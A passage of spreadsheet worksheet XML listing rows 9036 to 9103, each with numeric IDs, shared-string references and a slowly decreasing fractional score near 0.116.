      <c r="C9036" s="2" t="s">
        <v>8617</v>
      </c>
      <c r="D9036" s="2">
        <v>1.0</v>
      </c>
      <c r="E9036" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9036" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="9037" ht="15.75" customHeight="1">
      <c r="A9037" s="1">
        <v>368.0</v>
      </c>
      <c r="B9037" s="2">
        <v>1.6274451E7</v>
      </c>
      <c r="C9037" s="2" t="s">
        <v>8618</v>
      </c>
      <c r="D9037" s="2">
        <v>1.0</v>
      </c>
      <c r="E9037" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9037" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9038" ht="15.75" customHeight="1">
      <c r="A9038" s="1">
        <v>582.0</v>
      </c>
      <c r="B9038" s="2">
        <v>1.9134354E7</v>
      </c>
      <c r="C9038" s="2" t="s">
        <v>8619</v>
      </c>
      <c r="D9038" s="2">
        <v>1.0</v>
      </c>
      <c r="E9038" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9038" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9039" ht="15.75" customHeight="1">
      <c r="A9039" s="1">
        <v>6241.0</v>
      </c>
      <c r="B9039" s="2">
        <v>4.8082462E7</v>
      </c>
      <c r="C9039" s="2" t="s">
        <v>8620</v>
      </c>
      <c r="D9039" s="2">
        <v>1.0</v>
      </c>
      <c r="E9039" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9039" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9040" ht="15.75" customHeight="1">
      <c r="A9040" s="1">
        <v>6350.0</v>
      </c>
      <c r="B9040" s="2">
        <v>4.8318012E7</v>
      </c>
      <c r="C9040" s="2" t="s">
        <v>8621</v>
      </c>
      <c r="D9040" s="2">
        <v>1.0</v>
      </c>
      <c r="E9040" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9040" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9041" ht="15.75" customHeight="1">
      <c r="A9041" s="1">
        <v>7182.0</v>
      </c>
      <c r="B9041" s="2">
        <v>5.0564107E7</v>
      </c>
      <c r="C9041" s="2" t="s">
        <v>8622</v>
      </c>
      <c r="D9041" s="2">
        <v>1.0</v>
      </c>
      <c r="E9041" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9041" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9042" ht="15.75" customHeight="1">
      <c r="A9042" s="1">
        <v>8161.0</v>
      </c>
      <c r="B9042" s="2">
        <v>5.3199516E7</v>
      </c>
      <c r="C9042" s="2" t="s">
        <v>8623</v>
      </c>
      <c r="D9042" s="2">
        <v>1.0</v>
      </c>
      <c r="E9042" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9042" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9043" ht="15.75" customHeight="1">
      <c r="A9043" s="1">
        <v>9806.0</v>
      </c>
      <c r="B9043" s="2">
        <v>5.6581609E7</v>
      </c>
      <c r="C9043" s="2" t="s">
        <v>8624</v>
      </c>
      <c r="D9043" s="2">
        <v>1.0</v>
      </c>
      <c r="E9043" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9043" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9044" ht="15.75" customHeight="1">
      <c r="A9044" s="1">
        <v>9957.0</v>
      </c>
      <c r="B9044" s="2">
        <v>5.6913921E7</v>
      </c>
      <c r="C9044" s="2" t="s">
        <v>8625</v>
      </c>
      <c r="D9044" s="2">
        <v>1.0</v>
      </c>
      <c r="E9044" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9044" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9045" ht="15.75" customHeight="1">
      <c r="A9045" s="1">
        <v>12305.0</v>
      </c>
      <c r="B9045" s="2">
        <v>2.8372616E7</v>
      </c>
      <c r="C9045" s="2" t="s">
        <v>8626</v>
      </c>
      <c r="D9045" s="2">
        <v>1.0</v>
      </c>
      <c r="E9045" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9045" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9046" ht="15.75" customHeight="1">
      <c r="A9046" s="1">
        <v>13176.0</v>
      </c>
      <c r="B9046" s="2">
        <v>3.4012539E7</v>
      </c>
      <c r="C9046" s="2" t="s">
        <v>8627</v>
      </c>
      <c r="D9046" s="2">
        <v>1.0</v>
      </c>
      <c r="E9046" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9046" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="9047" ht="15.75" customHeight="1">
      <c r="A9047" s="1">
        <v>3045.0</v>
      </c>
      <c r="B9047" s="2">
        <v>3.648619E7</v>
      </c>
      <c r="C9047" s="2" t="s">
        <v>8628</v>
      </c>
      <c r="D9047" s="2">
        <v>1.0</v>
      </c>
      <c r="E9047" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9047" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="9048" ht="15.75" customHeight="1">
      <c r="A9048" s="1">
        <v>8178.0</v>
      </c>
      <c r="B9048" s="2">
        <v>5.3240629E7</v>
      </c>
      <c r="C9048" s="2" t="s">
        <v>8629</v>
      </c>
      <c r="D9048" s="2">
        <v>1.0</v>
      </c>
      <c r="E9048" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9048" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="9049" ht="15.75" customHeight="1">
      <c r="A9049" s="1">
        <v>14736.0</v>
      </c>
      <c r="B9049" s="2">
        <v>4.0691914E7</v>
      </c>
      <c r="C9049" s="2" t="s">
        <v>8630</v>
      </c>
      <c r="D9049" s="2">
        <v>1.0</v>
      </c>
      <c r="E9049" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9049" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="9050" ht="15.75" customHeight="1">
      <c r="A9050" s="1">
        <v>16259.0</v>
      </c>
      <c r="B9050" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C9050" s="2" t="s">
        <v>8631</v>
      </c>
      <c r="D9050" s="2">
        <v>1.0</v>
      </c>
      <c r="E9050" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9050" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="9051" ht="15.75" customHeight="1">
      <c r="A9051" s="1">
        <v>27824.0</v>
      </c>
      <c r="B9051" s="2">
        <v>2.3389041E7</v>
      </c>
      <c r="C9051" s="2" t="s">
        <v>8632</v>
      </c>
      <c r="D9051" s="2">
        <v>1.0</v>
      </c>
      <c r="E9051" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9051" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="9052" ht="15.75" customHeight="1">
      <c r="A9052" s="1">
        <v>2750.0</v>
      </c>
      <c r="B9052" s="2">
        <v>3.5068592E7</v>
      </c>
      <c r="C9052" s="2" t="s">
        <v>8633</v>
      </c>
      <c r="D9052" s="2">
        <v>1.0</v>
      </c>
      <c r="E9052" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9052" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9053" ht="15.75" customHeight="1">
      <c r="A9053" s="1">
        <v>4759.0</v>
      </c>
      <c r="B9053" s="2">
        <v>4.3406262E7</v>
      </c>
      <c r="C9053" s="2" t="s">
        <v>8634</v>
      </c>
      <c r="D9053" s="2">
        <v>1.0</v>
      </c>
      <c r="E9053" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9053" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9054" ht="15.75" customHeight="1">
      <c r="A9054" s="1">
        <v>8621.0</v>
      </c>
      <c r="B9054" s="2">
        <v>5.4279904E7</v>
      </c>
      <c r="C9054" s="2" t="s">
        <v>8635</v>
      </c>
      <c r="D9054" s="2">
        <v>1.0</v>
      </c>
      <c r="E9054" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9054" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9055" ht="15.75" customHeight="1">
      <c r="A9055" s="1">
        <v>8874.0</v>
      </c>
      <c r="B9055" s="2">
        <v>5.4751622E7</v>
      </c>
      <c r="C9055" s="2" t="s">
        <v>8636</v>
      </c>
      <c r="D9055" s="2">
        <v>1.0</v>
      </c>
      <c r="E9055" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9055" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9056" ht="15.75" customHeight="1">
      <c r="A9056" s="1">
        <v>9577.0</v>
      </c>
      <c r="B9056" s="2">
        <v>5.607418E7</v>
      </c>
      <c r="C9056" s="2" t="s">
        <v>8637</v>
      </c>
      <c r="D9056" s="2">
        <v>1.0</v>
      </c>
      <c r="E9056" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9056" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9057" ht="15.75" customHeight="1">
      <c r="A9057" s="1">
        <v>10281.0</v>
      </c>
      <c r="B9057" s="2">
        <v>5.7628197E7</v>
      </c>
      <c r="C9057" s="2" t="s">
        <v>8638</v>
      </c>
      <c r="D9057" s="2">
        <v>1.0</v>
      </c>
      <c r="E9057" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9057" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9058" ht="15.75" customHeight="1">
      <c r="A9058" s="1">
        <v>11793.0</v>
      </c>
      <c r="B9058" s="2">
        <v>2.4371727E7</v>
      </c>
      <c r="C9058" s="2" t="s">
        <v>8639</v>
      </c>
      <c r="D9058" s="2">
        <v>1.0</v>
      </c>
      <c r="E9058" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9058" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9059" ht="15.75" customHeight="1">
      <c r="A9059" s="1">
        <v>19911.0</v>
      </c>
      <c r="B9059" s="2">
        <v>5.7355971E7</v>
      </c>
      <c r="C9059" s="2" t="s">
        <v>8640</v>
      </c>
      <c r="D9059" s="2">
        <v>1.0</v>
      </c>
      <c r="E9059" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9059" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9060" ht="15.75" customHeight="1">
      <c r="A9060" s="1">
        <v>26915.0</v>
      </c>
      <c r="B9060" s="2">
        <v>1.9359456E7</v>
      </c>
      <c r="C9060" s="2" t="s">
        <v>8641</v>
      </c>
      <c r="D9060" s="2">
        <v>1.0</v>
      </c>
      <c r="E9060" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9060" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="9061" ht="15.75" customHeight="1">
      <c r="A9061" s="1">
        <v>1882.0</v>
      </c>
      <c r="B9061" s="2">
        <v>2.9757063E7</v>
      </c>
      <c r="C9061" s="2" t="s">
        <v>8642</v>
      </c>
      <c r="D9061" s="2">
        <v>1.0</v>
      </c>
      <c r="E9061" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9061" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="9062" ht="15.75" customHeight="1">
      <c r="A9062" s="1">
        <v>11001.0</v>
      </c>
      <c r="B9062" s="2">
        <v>1.7653955E7</v>
      </c>
      <c r="C9062" s="2" t="s">
        <v>8643</v>
      </c>
      <c r="D9062" s="2">
        <v>1.0</v>
      </c>
      <c r="E9062" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9062" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="9063" ht="15.75" customHeight="1">
      <c r="A9063" s="1">
        <v>25824.0</v>
      </c>
      <c r="B9063" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C9063" s="2" t="s">
        <v>8644</v>
      </c>
      <c r="D9063" s="2">
        <v>1.0</v>
      </c>
      <c r="E9063" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9063" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="9064" ht="15.75" customHeight="1">
      <c r="A9064" s="1">
        <v>29946.0</v>
      </c>
      <c r="B9064" s="2">
        <v>3607504.0</v>
      </c>
      <c r="C9064" s="2" t="s">
        <v>8645</v>
      </c>
      <c r="D9064" s="2">
        <v>1.0</v>
      </c>
      <c r="E9064" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9064" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="9065" ht="15.75" customHeight="1">
      <c r="A9065" s="1">
        <v>2413.0</v>
      </c>
      <c r="B9065" s="2">
        <v>3.351377E7</v>
      </c>
      <c r="C9065" s="2" t="s">
        <v>8646</v>
      </c>
      <c r="D9065" s="2">
        <v>1.0</v>
      </c>
      <c r="E9065" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9065" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="9066" ht="15.75" customHeight="1">
      <c r="A9066" s="1">
        <v>2458.0</v>
      </c>
      <c r="B9066" s="2">
        <v>3.3729668E7</v>
      </c>
      <c r="C9066" s="2" t="s">
        <v>8647</v>
      </c>
      <c r="D9066" s="2">
        <v>1.0</v>
      </c>
      <c r="E9066" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9066" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="9067" ht="15.75" customHeight="1">
      <c r="A9067" s="1">
        <v>17707.0</v>
      </c>
      <c r="B9067" s="2">
        <v>5.0595427E7</v>
      </c>
      <c r="C9067" s="2" t="s">
        <v>8648</v>
      </c>
      <c r="D9067" s="2">
        <v>1.0</v>
      </c>
      <c r="E9067" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9067" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="9068" ht="15.75" customHeight="1">
      <c r="A9068" s="1">
        <v>7292.0</v>
      </c>
      <c r="B9068" s="2">
        <v>5.0814994E7</v>
      </c>
      <c r="C9068" s="2" t="s">
        <v>8649</v>
      </c>
      <c r="D9068" s="2">
        <v>1.0</v>
      </c>
      <c r="E9068" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9068" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="9069" ht="15.75" customHeight="1">
      <c r="A9069" s="1">
        <v>8571.0</v>
      </c>
      <c r="B9069" s="2">
        <v>5.4188043E7</v>
      </c>
      <c r="C9069" s="2" t="s">
        <v>8650</v>
      </c>
      <c r="D9069" s="2">
        <v>1.0</v>
      </c>
      <c r="E9069" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9069" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="9070" ht="15.75" customHeight="1">
      <c r="A9070" s="1">
        <v>9781.0</v>
      </c>
      <c r="B9070" s="2">
        <v>5.6517144E7</v>
      </c>
      <c r="C9070" s="2" t="s">
        <v>8651</v>
      </c>
      <c r="D9070" s="2">
        <v>1.0</v>
      </c>
      <c r="E9070" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9070" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="9071" ht="15.75" customHeight="1">
      <c r="A9071" s="1">
        <v>12153.0</v>
      </c>
      <c r="B9071" s="2">
        <v>2.7300612E7</v>
      </c>
      <c r="C9071" s="2" t="s">
        <v>8652</v>
      </c>
      <c r="D9071" s="2">
        <v>1.0</v>
      </c>
      <c r="E9071" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9071" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="9072" ht="15.75" customHeight="1">
      <c r="A9072" s="1">
        <v>13553.0</v>
      </c>
      <c r="B9072" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C9072" s="2" t="s">
        <v>8653</v>
      </c>
      <c r="D9072" s="2">
        <v>1.0</v>
      </c>
      <c r="E9072" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9072" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="9073" ht="15.75" customHeight="1">
      <c r="A9073" s="1">
        <v>22814.0</v>
      </c>
      <c r="B9073" s="2">
        <v>4.6145752E7</v>
      </c>
      <c r="C9073" s="2" t="s">
        <v>8654</v>
      </c>
      <c r="D9073" s="2">
        <v>1.0</v>
      </c>
      <c r="E9073" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9073" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="9074" ht="15.75" customHeight="1">
      <c r="A9074" s="1">
        <v>6174.0</v>
      </c>
      <c r="B9074" s="2">
        <v>4.7888146E7</v>
      </c>
      <c r="C9074" s="2" t="s">
        <v>8655</v>
      </c>
      <c r="D9074" s="2">
        <v>1.0</v>
      </c>
      <c r="E9074" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9074" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="9075" ht="15.75" customHeight="1">
      <c r="A9075" s="1">
        <v>8060.0</v>
      </c>
      <c r="B9075" s="2">
        <v>5.2919389E7</v>
      </c>
      <c r="C9075" s="2" t="s">
        <v>8656</v>
      </c>
      <c r="D9075" s="2">
        <v>1.0</v>
      </c>
      <c r="E9075" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9075" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="9076" ht="15.75" customHeight="1">
      <c r="A9076" s="1">
        <v>6836.0</v>
      </c>
      <c r="B9076" s="2">
        <v>4.9602642E7</v>
      </c>
      <c r="C9076" s="2" t="s">
        <v>8657</v>
      </c>
      <c r="D9076" s="2">
        <v>1.0</v>
      </c>
      <c r="E9076" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9076" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="9077" ht="15.75" customHeight="1">
      <c r="A9077" s="1">
        <v>15837.0</v>
      </c>
      <c r="B9077" s="2">
        <v>4.4354998E7</v>
      </c>
      <c r="C9077" s="2" t="s">
        <v>8658</v>
      </c>
      <c r="D9077" s="2">
        <v>1.0</v>
      </c>
      <c r="E9077" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9077" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="9078" ht="15.75" customHeight="1">
      <c r="A9078" s="1">
        <v>17939.0</v>
      </c>
      <c r="B9078" s="2">
        <v>5.1249805E7</v>
      </c>
      <c r="C9078" s="2" t="s">
        <v>8659</v>
      </c>
      <c r="D9078" s="2">
        <v>1.0</v>
      </c>
      <c r="E9078" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9078" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="9079" ht="15.75" customHeight="1">
      <c r="A9079" s="1">
        <v>3980.0</v>
      </c>
      <c r="B9079" s="2">
        <v>4.0833868E7</v>
      </c>
      <c r="C9079" s="2" t="s">
        <v>8660</v>
      </c>
      <c r="D9079" s="2">
        <v>1.0</v>
      </c>
      <c r="E9079" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9079" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="9080" ht="15.75" customHeight="1">
      <c r="A9080" s="1">
        <v>10269.0</v>
      </c>
      <c r="B9080" s="2">
        <v>5.7616142E7</v>
      </c>
      <c r="C9080" s="2" t="s">
        <v>8661</v>
      </c>
      <c r="D9080" s="2">
        <v>1.0</v>
      </c>
      <c r="E9080" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9080" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="9081" ht="15.75" customHeight="1">
      <c r="A9081" s="1">
        <v>13936.0</v>
      </c>
      <c r="B9081" s="2">
        <v>3.7139139E7</v>
      </c>
      <c r="C9081" s="2" t="s">
        <v>8662</v>
      </c>
      <c r="D9081" s="2">
        <v>1.0</v>
      </c>
      <c r="E9081" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9081" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="9082" ht="15.75" customHeight="1">
      <c r="A9082" s="1">
        <v>30376.0</v>
      </c>
      <c r="B9082" s="2">
        <v>3.8479012E7</v>
      </c>
      <c r="C9082" s="2" t="s">
        <v>8663</v>
      </c>
      <c r="D9082" s="2">
        <v>1.0</v>
      </c>
      <c r="E9082" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9082" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="9083" ht="15.75" customHeight="1">
      <c r="A9083" s="1">
        <v>31658.0</v>
      </c>
      <c r="B9083" s="2">
        <v>5.1724975E7</v>
      </c>
      <c r="C9083" s="2" t="s">
        <v>8664</v>
      </c>
      <c r="D9083" s="2">
        <v>1.0</v>
      </c>
      <c r="E9083" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9083" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="9084" ht="15.75" customHeight="1">
      <c r="A9084" s="1">
        <v>444.0</v>
      </c>
      <c r="B9084" s="2">
        <v>1.7068059E7</v>
      </c>
      <c r="C9084" s="2" t="s">
        <v>8665</v>
      </c>
      <c r="D9084" s="2">
        <v>1.0</v>
      </c>
      <c r="E9084" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9084" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9085" ht="15.75" customHeight="1">
      <c r="A9085" s="1">
        <v>3222.0</v>
      </c>
      <c r="B9085" s="2">
        <v>3.7314289E7</v>
      </c>
      <c r="C9085" s="2" t="s">
        <v>8666</v>
      </c>
      <c r="D9085" s="2">
        <v>1.0</v>
      </c>
      <c r="E9085" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9085" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9086" ht="15.75" customHeight="1">
      <c r="A9086" s="1">
        <v>9070.0</v>
      </c>
      <c r="B9086" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C9086" s="2" t="s">
        <v>8667</v>
      </c>
      <c r="D9086" s="2">
        <v>1.0</v>
      </c>
      <c r="E9086" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9086" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9087" ht="15.75" customHeight="1">
      <c r="A9087" s="1">
        <v>16920.0</v>
      </c>
      <c r="B9087" s="2">
        <v>4.8137942E7</v>
      </c>
      <c r="C9087" s="2" t="s">
        <v>8668</v>
      </c>
      <c r="D9087" s="2">
        <v>1.0</v>
      </c>
      <c r="E9087" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9087" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9088" ht="15.75" customHeight="1">
      <c r="A9088" s="1">
        <v>20311.0</v>
      </c>
      <c r="B9088" s="2">
        <v>1.1395535E7</v>
      </c>
      <c r="C9088" s="2" t="s">
        <v>8669</v>
      </c>
      <c r="D9088" s="2">
        <v>1.0</v>
      </c>
      <c r="E9088" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9088" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9089" ht="15.75" customHeight="1">
      <c r="A9089" s="1">
        <v>24595.0</v>
      </c>
      <c r="B9089" s="2">
        <v>1.1395534E7</v>
      </c>
      <c r="C9089" s="2" t="s">
        <v>8669</v>
      </c>
      <c r="D9089" s="2">
        <v>1.0</v>
      </c>
      <c r="E9089" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9089" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9090" ht="15.75" customHeight="1">
      <c r="A9090" s="1">
        <v>25815.0</v>
      </c>
      <c r="B9090" s="2">
        <v>1.4768341E7</v>
      </c>
      <c r="C9090" s="2" t="s">
        <v>8670</v>
      </c>
      <c r="D9090" s="2">
        <v>1.0</v>
      </c>
      <c r="E9090" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9090" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9091" ht="15.75" customHeight="1">
      <c r="A9091" s="1">
        <v>32715.0</v>
      </c>
      <c r="B9091" s="2">
        <v>5966521.0</v>
      </c>
      <c r="C9091" s="2" t="s">
        <v>8365</v>
      </c>
      <c r="D9091" s="2">
        <v>1.0</v>
      </c>
      <c r="E9091" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9091" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="9092" ht="15.75" customHeight="1">
      <c r="A9092" s="1">
        <v>26315.0</v>
      </c>
      <c r="B9092" s="2">
        <v>1.6648721E7</v>
      </c>
      <c r="C9092" s="2" t="s">
        <v>8671</v>
      </c>
      <c r="D9092" s="2">
        <v>1.0</v>
      </c>
      <c r="E9092" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9092" s="2">
        <v>0.115257048092869</v>
      </c>
    </row>
    <row r="9093" ht="15.75" customHeight="1">
      <c r="A9093" s="1">
        <v>29718.0</v>
      </c>
      <c r="B9093" s="2">
        <v>3.4436822E7</v>
      </c>
      <c r="C9093" s="2" t="s">
        <v>8672</v>
      </c>
      <c r="D9093" s="2">
        <v>1.0</v>
      </c>
      <c r="E9093" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9093" s="2">
        <v>0.1151368760064412</v>
      </c>
    </row>
    <row r="9094" ht="15.75" customHeight="1">
      <c r="A9094" s="1">
        <v>1788.0</v>
      </c>
      <c r="B9094" s="2">
        <v>2.909613E7</v>
      </c>
      <c r="C9094" s="2" t="s">
        <v>8673</v>
      </c>
      <c r="D9094" s="2">
        <v>1.0</v>
      </c>
      <c r="E9094" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9094" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="9095" ht="15.75" customHeight="1">
      <c r="A9095" s="1">
        <v>6106.0</v>
      </c>
      <c r="B9095" s="2">
        <v>4.7723174E7</v>
      </c>
      <c r="C9095" s="2" t="s">
        <v>8674</v>
      </c>
      <c r="D9095" s="2">
        <v>1.0</v>
      </c>
      <c r="E9095" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9095" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="9096" ht="15.75" customHeight="1">
      <c r="A9096" s="1">
        <v>13961.0</v>
      </c>
      <c r="B9096" s="2">
        <v>3.7309598E7</v>
      </c>
      <c r="C9096" s="2" t="s">
        <v>8675</v>
      </c>
      <c r="D9096" s="2">
        <v>1.0</v>
      </c>
      <c r="E9096" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9096" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="9097" ht="15.75" customHeight="1">
      <c r="A9097" s="1">
        <v>14151.0</v>
      </c>
      <c r="B9097" s="2">
        <v>3.7990743E7</v>
      </c>
      <c r="C9097" s="2" t="s">
        <v>8676</v>
      </c>
      <c r="D9097" s="2">
        <v>1.0</v>
      </c>
      <c r="E9097" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9097" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="9098" ht="15.75" customHeight="1">
      <c r="A9098" s="1">
        <v>1018.0</v>
      </c>
      <c r="B9098" s="2">
        <v>2.3165414E7</v>
      </c>
      <c r="C9098" s="2" t="s">
        <v>8677</v>
      </c>
      <c r="D9098" s="2">
        <v>1.0</v>
      </c>
      <c r="E9098" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9098" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9099" ht="15.75" customHeight="1">
      <c r="A9099" s="1">
        <v>5972.0</v>
      </c>
      <c r="B9099" s="2">
        <v>4.7360924E7</v>
      </c>
      <c r="C9099" s="2" t="s">
        <v>8678</v>
      </c>
      <c r="D9099" s="2">
        <v>1.0</v>
      </c>
      <c r="E9099" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9099" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9100" ht="15.75" customHeight="1">
      <c r="A9100" s="1">
        <v>9583.0</v>
      </c>
      <c r="B9100" s="2">
        <v>5.6091506E7</v>
      </c>
      <c r="C9100" s="2" t="s">
        <v>8679</v>
      </c>
      <c r="D9100" s="2">
        <v>1.0</v>
      </c>
      <c r="E9100" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9100" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9101" ht="15.75" customHeight="1">
      <c r="A9101" s="1">
        <v>9633.0</v>
      </c>
      <c r="B9101" s="2">
        <v>5.6232353E7</v>
      </c>
      <c r="C9101" s="2" t="s">
        <v>8680</v>
      </c>
      <c r="D9101" s="2">
        <v>1.0</v>
      </c>
      <c r="E9101" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9101" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9102" ht="15.75" customHeight="1">
      <c r="A9102" s="1">
        <v>9777.0</v>
      </c>
      <c r="B9102" s="2">
        <v>5.6510436E7</v>
      </c>
      <c r="C9102" s="2" t="s">
        <v>8681</v>
      </c>
      <c r="D9102" s="2">
        <v>1.0</v>
      </c>
      <c r="E9102" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9102" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="9103" ht="15.75" customHeight="1">
      <c r="A9103" s="1">
        <v>10099.0</v>
      </c>
      <c r="B9103" s="2">
        <v>5.7205271E7</v>
      </c>
